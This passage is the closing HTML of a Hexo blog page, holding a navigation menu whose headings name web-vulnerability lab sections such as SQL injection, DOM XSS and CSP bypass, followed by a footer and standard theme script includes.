href="#SQL-Injection"><span class="nav-number">2.7.</span> <span class="nav-text">SQL Injection</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL-Injection-Blind-盲注"><span class="nav-number">2.8.</span> <span class="nav-text">SQL Injection (Blind)盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Weak-Session-IDs"><span class="nav-number">2.9.</span> <span class="nav-text">Weak Session IDs</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS（DOM）"><span class="nav-number">2.10.</span> <span class="nav-text">XSS（DOM）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSP-Bypass-内容安全策略绕过"><span class="nav-number">2.11.</span> <span class="nav-text">CSP Bypass  内容安全策略绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Java-Script-Attacks-JS攻击"><span class="nav-number">2.12.</span> <span class="nav-text">Java Script Attacks JS攻击</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Kae</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
